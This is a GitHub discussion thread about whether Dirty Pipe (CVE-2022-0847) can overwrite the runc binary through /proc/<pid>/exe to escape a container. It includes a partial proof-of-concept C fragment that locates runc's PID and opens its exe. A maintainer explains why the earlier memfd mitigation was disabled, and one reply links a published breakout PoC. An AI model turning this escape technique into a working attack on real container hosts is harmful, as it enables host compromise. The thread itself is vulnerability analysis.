-
Overwriting /proc/runc pid/exe through dirty pipe(CVE-2022-0847) can cause container escape like CVE-2019-5736 But CVE-2019-5736 was fixed by memfd_create in commit nsenter: clone /proc/self/exe to avoid exposing host binary to container For now i think /proc/runc pid/exe is an in-memory file, if we open it we can get fd created by static int proc_exe_link(struct dentry *dentry, struct path *exe_path)
{
struct task_struct *task;
struct file *exe_file;
task = get_proc_task(d_inode(dentry));
if (!task)
return -ENOENT;
exe_file = get_task_exe_file(task);
put_task_struct(task);
if (exe_file) {
*exe_path = exe_file->f_path;
path_get(&exe_file->f_path);
fput(exe_file);
return 0;
} else
return -ENOENT;
}
But my poc works and i don't know why Steps :
while (found == 0) {
dir = opendir("/proc");
while ((ptr = readdir(dir)) != NULL) {
snprintf(path, sizeof(path), "/proc/%s/cmdline", ptr->d_name);
if (isRuncProcess(path, "runc")) {
found = atoi(ptr->d_name);
printf("[+] Found the RUNC PID: %d\n", found);
break;
}
}
closedir(dir);
}
int handleFd = -1;
while (handleFd == -1) {
snprintf(path, sizeof(path), "/proc/%d/exe", found);
handleFd = open(path, O_RDONLY);
}
|
Beta Was this translation helpful? Give feedback.
Replies: 4 comments 5 replies
-
Because of many complaints by Kubertnetes folks, we switched to making /proc/self/exe a read-only bind-mount. The memfd logic still exists but it's only exercised by rootless containers. It's pretty frustrating that I implemented a protection against this precise issue which we were forced to disable because Kubertnetes integration tests started failing (copying the binary increases memory usage by a few MB and the Kubertnetes tests had tiny memory limits). |
Beta Was this translation helpful? Give feedback.
-
Oh my god, it looks like this, no wonder the actual performance of runc is not the same as the previous fix report. Then I have a new question : runc/libcontainer/nsenter/cloned_binary.c Line 510 in 98b75be by Am I right? |
Beta Was this translation helpful? Give feedback.
-
For what it's worth, we published a container escape PoC based on overwriting the runC binary: https://github.com/DataDog/dirtypipe-container-breakout-poc We did confirm that using a modified runC version cloning the binary instead of bind-mounting it does cause it to fail |
Beta Was this translation helpful? Give feedback.
Because of many complaints by Kubertnetes folks, we switched to making /proc/self/exe a read-only bind-mount. The memfd logic still exists but it's only exercised by rootless containers.
It's pretty frustrating that I implemented a protection against this precise issue which we were forced to disable because Kubertnetes integration tests started failing (copying the binary increases memory usage by a few MB and the Kubertnetes tests had tiny memory limits).